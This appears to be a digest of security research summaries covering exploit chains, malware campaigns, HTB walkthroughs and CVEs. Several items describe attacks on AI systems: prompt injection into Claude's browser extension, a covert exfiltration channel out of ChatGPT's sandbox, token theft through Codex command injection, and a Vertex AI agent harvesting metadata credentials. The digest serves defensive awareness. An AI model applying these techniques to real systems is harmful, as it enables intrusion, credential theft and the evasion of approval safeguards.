Looker (Google Cloud) used Git CLI for SSH remotes. A directory-deletion API allowed dir_path_array=["/"], making File.join(path, "/") resolve to the repo root and FileUtils.rm_rf delete the whole repo including .git. By racing deletion (slow rm_rf post-order traversal + ext4-influenced readdir order) to remove .git early while attacker-controlled worktree “pseudo-git” files persist, concurrent Git operations like git status read forged worktree config and execute commands via core.fsmonitor. Post-RCE, a Kubernetes service account could update secrets in a shared namespace, enabling cross-instance escalation.

🧩 AD | 🎟️ Kerberos | 🛠️ Tool | 🎁 PoC

🔗 Original article: https://www.synacktiv.com/en/publications/exploring-cross-domain-cross-forest-rbcd.html

Synacktiv shows how to perform RBCD when the delegating computer account is in a different domain or forest than the target machine. It demonstrates configuring msDS-AllowedToActOnBehalfOfOtherIdentity via NTLM relay to LDAP (cross-domain requires using the delegator SID), then reproduces the exact cross-realm Kerberos S4U2Self/S4U2Proxy sequence (6-step flow). Stock Impacket getST.py fails due to realm handling and missing independent S4U2Proxy; Synacktiv provides a modified Impacket branch adding cross-domain + cross-forest support (PA-PAC-OPTIONS branch-aware, RC4 final ticket), enabling SMB C$ access with ccache tickets.

Tool | Web3 | Web | Analysis

🔗 Original article: https://blog.trailofbits.com/2026/03/25/try-our-new-dimensional-analysis-claude-plugin/

Trail of Bits released the Claude Code plugin "dimensional-analysis" to find unit/dimension mismatches in arithmetic-heavy code (notably DeFi). It has the LLM generate a unit vocabulary (DIMENSIONAL_UNITS.md) and anchor annotations, then mechanically checks mismatches across arithmetic, assignments, calls/returns, and external calls. Reported benchmark: 93% recall (±12%) vs 50% (±20%) for baseline prompts. Includes install commands and a Solidity annotation example.

🛡️ CVE | 📱 Mobile | 🔗 Deep Links | 🎁 PoC

🔗 Original article: https://khaledsec.medium.com/microsoft-authenticators-unclaimed-deep-link-a-full-account-takeover-story-cve-2026-26123-e0409a920a02

CVE-2026-26123: A custom-scheme onboarding deep link (ms-msa://) used by Microsoft Authenticator can be hijacked if the legitimate app doesn’t properly claim/handle it. A malicious Android app registers android:scheme="ms-msa", receives the QR-scanned URI, extracts code via getIntent().getData().getQueryParameter("code"), and exfiltrates it for token replay—enabling Microsoft account takeover (per author). Mitigate with verified links/app-link verification and updating Authenticator (Android <6.2511.7533, iOS <6.8.40 per provided summary).

Social Engineering | Windows | LOLBAS | RAT

🔗 Original article: https://redcanary.com/blog/threat-intelligence/scarlet-goldfinch-clickfix/

Scarlet Goldfinch shifted from fake browser updates (malicious JavaScript dropping NetSupport Manager) to “paste-and-run/ClickFix” user execution (MITRE T1204.004). In Epoch 7 (mid-Jan 2026+), it iterates CMD one-liners to evade detection: swaps forfiles→if exist (Notepad check), keeps mshta for HTA execution, splits curl download from mshta to avoid mshta-network detections, and adds obfuscation (cmd.exe /v:on, caret escaping, substring indexing like ycyyruyly → indices 1,5,4,7 = curl). Later it stages in %LOCALAPPDATA%\\AppData\\Local numeric folders, curl-downloads a “PDF” archive, tar -xf extracts, then executes a legit EXE to DLL-sideload Remcos, which persists/installs NetSupport Manager.

🛡️ Threat | 🦠 Malware | 🐧 Linux | 🕵️ Evasion

🔗 Original article: https://www.rapid7.com/blog/post/tr-bpfdoor-telecom-networks-sleeper-cells-threat-research-report

Rapid7 reports Red Menshen’s telecom espionage using BPFdoor, a Linux backdoor that installs a malicious in-kernel BPF filter to watch for “magic” triggers without opening ports (netstat/ss/nmap look clean). Newer variants hide triggers inside HTTPS (post-SSL termination), use a fixed-offset “magic ruler” (marker “9999” at 26 bytes for SOCK_DGRAM or 40 for SOCK_RAW), encrypt post-activation C2 with RC4-MD5, and add ICMP host-to-host control via send_ICMP_data using 0xFFFFFFFF as an end-of-chain flag. SCTP inspection enables signaling-plane surveillance and tracking.

🦠 Malware | 🕵️ Espionage | 🧩 Loader | 🛠️ TTP

🔗 Original article: https://unit42.paloaltonetworks.com/espionage-campaigns-target-se-asian-government-org/

Unit 42 reports (published March 26, 2026) three parallel espionage clusters targeting a SE Asian government (Jun–Aug 2025). Stately Taurus used USBFect/HIUPAN worming to deploy ClaimLoader (EVENT.dll) which XOR-decrypts shellcode and runs PUBLOAD via CryptEnumOIDInfo, exfiltrating host info over TCP with fake TLS bytes 17 03 03. CL-STA-1048 deployed EggStremeFuel (RC4 config in Cookies.dat + session-key RC4), Masol RAT (HTTP POST + AES), EggStreme loader (DarkLoadLibrary/libpeconv) to run Gorem RAT (gRPC, keylogger to thumbcache.dat) and TrackBak. CL-STA-1049 sideloaded Hypnosis loader (version.dll) via Bitdefender seccenter.exe to load likely FluffyGh0st plugins (RC4 + LZNT1, InstallPlugin).

🛠️ Tool | 🛡️ CVE | 💣 RCE | 🌐 Web

🔗 Original article: https://www.rapid7.com/blog/post/pt-metasploit-wrap-up-03-27-2026

Rapid7’s Metasploit Wrap-Up (Mar 27, 2026) improves SMB NTLM relay compatibility by immediately forwarding Net-NTLM messages when a single relay target is set and updating RubySMB to mimic Windows net use for multi-target relays. It adds 3 modules: CVE-2026-23767 ESC/POS unauth printer command injection, CVE-2025-12548 Eclipse Che machine-exec unauth RCE via WebSocket JSON-RPC on port 3333 (affecting OpenShift DevSpaces), and CVE-2023-2868 Barracuda ESG TAR filename backtick injection RCE. Includes msfvenom/msfconsole fixes and relay bug fixes.

🛡️ CVE | 🌐 Web | 🧬 Smuggling | 🎁 PoC

🔗 Original article: https://xclow3n.github.io/post/6/

Pingora (Rust reverse proxy) had 3 default-config request smuggling bugs and 1 cache poisoning bug (reported Dec 2025–Jan 2026), fixed in Pingora 0.8.0. CVE-2026-2833: any Upgrade header triggers raw passthrough before backend 101, enabling pipelined smuggled requests. CVE-2026-2835: TE misparsing (comma lists and duplicate TE headers) + TE→strip CL + HTTP/1.0 close-delimited fallback lets backends parse a second request after 0\r\n\r\n. CVE-2026-2836: default cache key uses only path, omitting Host, enabling cross-tenant cache poisoning/stored XSS.

🌐 Web | 💣 RCE | 🛠️ Tool | 🧬 PrivEsc

🔗 Original article: https://0xdf.gitlab.io/2026/03/28/htb-browsed.html

Browsed runs uploaded Chrome extensions in headless Chrome and returns verbose debug logs. The logs leak internal targets like browsedinternals.htb and http://localhost/. A malicious Manifest V3 extension uses a background service worker to SSRF into localhost, reaching a Flask app and exploiting a Bash arithmetic evaluation injection in a shell script for RCE. Root is obtained by poisoning a world-writable Python __pycache__ .pyc imported by a sudo-allowed script.

🧩 Browser Extension | 💉 XSS | 🔗 postMessage | 🛡️ CVE

🔗 Original article: https://www.koi.ai/blog/shadowprompt-how-any-website-could-have-hijacked-anthropic-claude-chrome-extension

ShadowPrompt is a drive-by exploit chain against Claude’s Chrome extension (<1.0.41). The extension accepted a privileged onboarding_task via chrome.runtime.sendMessage() from any *.claude.ai origin. An older Arkose CAPTCHA asset on a-cdn.claude.ai had DOM XSS: no postMessage origin check and React dangerouslySetInnerHTML rendering attacker-controlled stringTable HTML (e.g., <img onerror=...>). XSS JS then messaged the extension ID to inject an attacker prompt. Fixes: strict origin == https://claude.ai; Arkose blocked old asset (403).

🛡️ CVE | 🌐 Web | 💥 Auth Bypass | ⬆️ Privesc

🔗 Original article: https://0xdf.gitlab.io/2026/03/30/htb-principal.html

HTB Principal: Jetty/Spring Boot on 8080 uses pac4j-jwt/6.0.3 with JWE tokens and an exposed JWKS at /api/auth/jwks. CVE-2026-29000 lets an attacker encrypt an unsigned inner JWT (alg=none) with the server’s RSA public key, causing pac4j to skip signature verification and accept attacker-controlled claims like ROLE_ADMIN. Admin dashboard leaks usernames and an “encryptionKey” used to spray SSH, yielding svc-deploy. Root is achieved by abusing access to SSH CA material under /opt/principal/ssh to mint a root certificate and SSH in as root.

🧠 AI | 📤 Exfiltration | 🌐 DNS | 🎁 PoC

🔗 Original article: https://research.checkpoint.com/2026/chatgpt-data-leakage-via-a-hidden-outbound-channel-in-the-code-execution-runtime/

Check Point found a (fixed) covert outbound channel from ChatGPT’s isolated code-execution/Data Analysis Linux runtime. The weakness allowed silent exfiltration of later user messages, uploaded-file extracts, and high-value model outputs without Action approval prompts. The channel abused DNS tunneling: data encoded into subdomains for outbound leakage and small command fragments in DNS responses for inbound control, enabling a bidirectional C2 that can provide remote shell-like access inside the runtime. Fix deployed Feb 20, 2026.

🛡️ CVE | 💣 RCE | 🌐 Web | 💉 Injection

🔗 Original article: http://www.zerodayinitiative.com/advisories/ZDI-26-246/

ZDI-26-246 (March 30, 2026) discloses CVE-2026-5058 in aws-mcp-server: a critical (CVSS 9.8) unauthenticated OS command injection in the allowed commands list handling. A user-supplied string is not properly validated before a system call, enabling remote attackers to execute arbitrary commands and achieve RCE in the MCP server process context. No public PoC/payloads are included in the advisory.

💣 RCE | 🌐 Web | 🛠️ Tool | 🎁 PoC

🔗 Original article: https://www.beyondtrust.com/blog/entry/openai-codex-command-injection-vulnerability-github-token

BeyondTrust found a critical command injection in OpenAI Codex Cloud: the GitHub branch name from POST https://chatgpt.com/backend-api/wham/tasks was reflected into setup bash/git commands, allowing injected shell metacharacters. Attackers could steal GitHub OAuth “User Access Tokens” by dumping git remote get-url origin (token embedded) to a file and reading it back, or by creating a malicious GitHub branch that exfiltrates tokens via curl (spaces bypassed with ${IFS}). Impacts web, CLI, SDK, IDE; fixes shipped Dec 23 2025–Jan 30 2026.

☁️ Cloud | 🔐 IAM | 🧠 LLM/Agents | 💥 RCE

🔗 Original article: https://unit42.paloaltonetworks.com/double-agents-vertex-ai/

Unit 42 shows how a Vertex AI Agent Engine can be weaponized into a “double agent.” A malicious ADK tool queries the metadata server (hxxp[:]//metadata.google[.]internal/computeMetadata/v1/instance/?recursive=true) to extract service-agent credentials (service-<PROJECT-ID>@gcp-sa-aiplatform-re.iam.gserviceaccount[.]com). With default overprivileged P4SA permissions (storage.* list/get), attackers can read all GCS data in the consumer project, access restricted Google Artifact Registry images (cloud-aiplatform-private), enumerate packages via API, and read tenant-project artifacts (Dockerfile.zip, code.pkl). Pickle packaging implies conditional RCE if tampered. BYOSA is recommended.

🛡️ CVE | 💣 RCE | 🪟 Windows | 🧬 Supply Chain

🔗 Original article: https://research.checkpoint.com/2026/operation-truechaos-0-day-exploitation-against-southeast-asian-government-targets/

Check Point reports in-the-wild exploitation of TrueConf Windows client updater zero-day CVE-2026-3502 (CVSS 7.8). The client downloads updates from https://{server}/downlods/trueconf_client.exe (server file: C:\Program Files\TrueConf Server\ClientInstFiles) without integrity/authenticity checks, so a compromised on-prem server can push arbitrary executables to all clients. Attackers delivered an Inno Setup “update” dropping poweriso.exe + 7z-x64.dll (DLL sideload), fetched update.7z from 47.237.15[.]197 via FTP, and bypassed UAC using SysWOW64 iscsicpl.exe DLL hijack (PATH → iscsiexe.dll).

📡 Android | 🧬 Malware | 🛠️ Tool | 💣 RCE

🔗 Original article: https://cert.pl/en/posts/2026/03/fvncbot-analysis/

CERT Polska (30 Mar 2026) analyzed an Android FvncBot multi-stage campaign. A bank-themed lure (com.junk.knock) social-engineers “Install unknown apps”, XOR-decodes and dynamically loads code via DexClassLoader from /data/user/0/com.junk.knock/app_tell/tWyWeG.txt, then drops assets/apk/payload_grass.apk (com.core.town) and deep-links to core://setup to enable an Accessibility service disguised as “System Update”. com.core.town decrypts qkcCg.jpg using an RC4-like routine (key sDjCM) to a ZIP containing classes.dex. Final implant supports remote gestures, global actions, keylogging, UI-tree capture, overlays, MediaProjection streaming, and websocket sessions.